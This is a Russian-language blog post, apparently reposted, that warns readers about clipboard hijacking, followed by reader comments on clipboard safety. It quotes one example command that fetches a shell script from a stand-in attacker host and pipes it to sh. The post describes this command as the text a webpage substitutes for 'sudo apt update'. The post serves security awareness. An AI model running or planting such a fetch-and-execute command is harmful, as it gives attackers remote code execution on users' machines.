Азы компьютера

:

Дмитрий Цвет

7 янв 2022

От себя: это очень важно, внимательно ознакомиться со статьёй.

Она предостерегает пользователей об опасности прямого копирования-вставки в командную строку (неважно, в какой ОС - Windows, Linux) команд с сайтов, даже если вы видите вполне знакомый безобидный текст команды. В таких случаях наиболее подходящая поговорка - "не верь глазам своим".
Не вставляйте команды с веб-страниц – вас могут взломать
Вставляя скопированные команды в командную строку Windows или терминал в Linux вы можете скомпрометировать свою систему.

От себя: это очень важно, внимательно ознакомиться со статьёй. - 915342997340
Программисты, системные администраторы, исследователи безопасности или любители, копирующие и вставляющие команды с веб-страниц в консоль или терминал, имейте в виду, что вы рискуете скомпрометировать свою систему.

Технический специалист демонстрирует простой трюк, который заставит вас дважды подумать, прежде чем копировать и вставлять текст в терминал с веб-страниц.

Бэкдор в буфере обмена?

Недавно Габриэль Фридландер, основатель обучающей платформы Wizer по повышению осведомленности о безопасности, продемонстрировал очевидный, но удивительный способ взлома, который заставит вас остерегаться копирования и вставки команд с веб-страниц.

Как новички, так и опытные разработчики нередко копируют часто используемые команды с веб-страниц (например, из StackOverflow) и вставляют их в свои приложения, командную строку Windows или терминал Linux.

Фридлендер предупреждает, что веб-страница может скрытно заменять содержимое того, что находится в вашем буфере обмена, и то, что на самом деле будет скопировано в ваш буфер обмена, будет сильно отличаться от того, что вы намеревались скопировать.

Хуже того, без должной осмотрительности разработчик может осознать свою ошибку только после вставки скопированного текста, но тогда может быть уже слишком поздно.

В простом доказательстве концепции (PoC), опубликованном в своем блоге, Фридлендер просит читателей скопировать простую команду, с которой знакомо большинство системных администраторов и разработчиков:
От себя: это очень важно, внимательно ознакомиться со статьёй. - 915343047260
Теперь вставьте то, что вы скопировали из блога Фридлендера, в текстовое поле или блокнот, и результат, вероятно, вас удивит:
curl http://attacker-domain:8000/shell.sh | sh
Мало того, что вы получаете совершенно другую команду в вашем буфере обмена, но, что еще хуже, у нее есть символ новой строки (или возврат) в конце.
Это означает, что приведенный выше пример будет выполнен, как только он будет вставлен непосредственно в терминал Linux.
У тех, кто вставлял текст, могло создаться впечатление, что они скопировали знакомую безобидную команду sudo apt update, которая используется для получения обновленной информации об установленных списках пакетов.

Принцип работы подмены команды

Магия заключается в коде JavaScript, скрытом за HTML-страницей PoC, созданной Фридландером.

Как только вы копируете текст "sudo apt update", содержащийся в HTML-элементе, запускается фрагмент кода, показанный ниже.

После этого JavaScript "слушатель событий" перехватывает событие копирования и заменяет данные буфера обмена на вредоносный тестовый код Фридландера:
От себя: это очень важно, внимательно ознакомиться со статьёй. - 915343268444
Обратите внимание, что слушатели событий имеют множество законных случаев использования в JavaScript, но это лишь один пример того, как их можно использовать не по назначению.
"Вот почему вы НИКОГДА не должны копировать команды для вставки непосредственно в терминал", – предупреждает Фридландер.

"Вы думаете, что копируете одно, но оно заменяется чем-то другим, например, вредоносным кодом. Достаточно вставить одну строку кода в скопированный код, чтобы создать бэкдор в вашем приложении".

"Эта атака очень проста, но может быть и крайне вредоносной".
#БезопасностьНаСайтах

Комментарии

  • 7 янв 2022 19:05
    Уже давно и не раз уже встречался с такими "приколами", правда, копируя текст в перепечатываемую статью - вместе с текстом в конце автоматически "приписывается копирайт" - адрес источника типа "текст скопирован с сайта такого-то" (и адрес портала в Интернете). Ничто не мешает создателю этого контента при копировании не добавлять, а полностью заменять текст на что-либо другое - например "Хватит воровать мои статьи - пишите сами! Вася Пупкин!" или что-либо похлеще. Но есть "панацея" - простые "антикопирайтовые" скрипты! То есть, это скрипты, которые "убивают" скрипты, которые добавляют "копирайт" на сайтах. ;-)
    Фотография
  • 7 янв 2022 19:16
    Именно так. Встречался с подобным не раз. Вроде выделил часть текста, а в результате прилепляется "копирайт". Но это полбеды. Если вместо "взято с сайта" вставить какую-то команду, в смысле хотя бы статья о проверке системных файлов sfc /scannow чел недолго думая копирует со страницы (а зачем заморачиваться и вручную вбивать), а там прячется что-нибудь, допустим на удаление файлов, да не глядя вставляешь в комстроку от админа - и вуаля! Там же и автоматом и ENTER спрятано. Единственно, вставлять в блокнот, и убедившись, что текст соответствует написанному уже лезть в комстроку.
  • 7 янв 2022 19:41
    и то хлеб ремонтникам
  • 7 янв 2022 22:43
    Фотография
  • 7 янв 2022 23:03
    Господи, да "изобретений" такого рода полнО! Народные умельцы (пишу без кавычек) продолжают оттачивать своё мастерство, используя доверчивую лень некоторых. Ну, не всякий рожден быть программистом и компьютерным докой, но элементарные правила безопасности всё-таки очень не мешает выучить. Да и принимать к сведению предостережения тоже. Хотя бы в пределах "необходимой самообороны". Ну хотя бы чуть-чуть. 
    Не далее как вчера меня спросили в личке - отчего на очень стареньком компьютере с 1 гб памяти при конверте программой "видеомонтаж" видео в 4к 60 fps программа намертво виснет. Такой вот вопрос, Карл! Да ответ же в первых строчках вопроса - "очень старенький компьютер"! Так и живём.
  • 8 янв 2022 04:24
    Думаю ссылка не верна.
  • 8 янв 2022 05:22
    На рабочем столе лежит текст-файл со списком команд и их назначение,в основном редко используемые или длинные(зубрить ник чему).Туда и закидываю всё интересное,оттуда и беру.
    Хотя и копипаст напрямую бывает...А зря!
    Надобно полностью отказаться от прямого.
  • 8 янв 2022 05:26
    А вообще-буфер обмена самое дырявое в любой системе.Что окна,что пингвины.И поле там не пахано.
  • 8 янв 2022 05:50
    В некоторой степени поможет ClipIt.Там скопированное кажет именно тем что есть.И есть функции очистки буфера и настройки чего туда попадать не должно.
    Но думаю умельцы и это обойдут.
  • 8 янв 2022 06:12
    Фотография
  • 8 янв 2022 06:12
    Фотография
  • 8 янв 2022 07:02
    Кому интересно.ClipIt-linux.В дебианбасед есть Clipman-но он с глюками.
    Есть получше менеджер буфера обмена.И притом мультисистемный.Видоузятникам в том числе.

    CopyQ — расширенный менеджер буфера обмена
  • 9 янв 2022 01:20
    я это знал еще лет 15 назад,не к.... копировать что-то откуда-то,точка которую ты не заметишь,метку,любой рисунок как вариант гиперссылки,кодеры знают.
  • 9 янв 2022 01:22
    любой исполняемый файл,всякий странный сайт не Google,а Googlhe,процессы в системе непонятные,черви,трояны с флешек.